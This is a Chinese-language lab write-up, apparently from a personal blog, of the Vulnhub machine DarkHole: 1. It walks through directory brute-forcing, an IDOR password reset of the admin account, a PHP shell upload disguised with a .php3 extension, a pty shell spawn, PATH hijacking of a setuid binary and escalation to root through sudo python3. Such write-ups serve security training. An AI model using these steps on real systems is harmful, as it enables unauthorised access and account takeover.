Vulnhub-DARKHOLE-1
title: 'Vulnhub-DARKHOLE: 1'
tags: Vulnhub
abbrlink: aa472e4b
date: 2022-12-01 09:18:44
描述
Name: DarkHole: 1
Date release: 18 Jul 2021
Author: Jehad Alqurashi
Series: DarkHole
Difficulty: Easy
It's a box for beginners, but not easy, Good Luck
Hint: Don't waste your time For Brute-Force
nmap 扫描
kali 192.168.169.220
靶机 192.168.169.232
nmap扫描靶机
端口 22 80
访问80
目录爆破
gobuster dir -u http://192.168.169.232/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,js,php.bak,txt.bak,html.bak,json,git,git.bak,zip,zip.bak
- 没什么价值
功能点测试
注册 admin 显示被占用
用其他名字成功注册并登录
http://192.168.169.232/dashboard.php?id=2
又注册一个账号
http://192.168.169.232/dashboard.php?id=3
```
注意链接的id字段
自己注册的id是2和3
admin被占用
admin的id可能是1
越权
- 登录页面抓包
没看到id
- 修改密码
看到id
- 修改id=1
用户名admin的密码被修改为222222 登录成功
上传shell
- kali 开启监听
- 上传
上传限制
bp抓包改后缀
php3 上传成功
- 点击一下上传的文件
成功连接
python3 -c 'import pty;pty.spawn("/bin/bash")'
提权
- 一个root权限的文件
- 是个二进制文件,运行一下:
- 二进制文件是 id 的副本,它以用户 john 的身份执行,那可以创建一个具有相同名称的自定义二进制文件将目录导出到 PATH:
echo 'bash' > /tmp/id; chmod +x /tmp/id; export PATH=/tmp:$PATH
- 查看password文件得到密码 root123
- 切换用户john
- 写入shell
echo 'import os;os.system("/bin/bash")' > file.py
```
sudo python3 /home/john/file.py
本文是原创文章,采用 CC BY-NC-ND 4.0 协议,完整转载请注明来自 putdown.top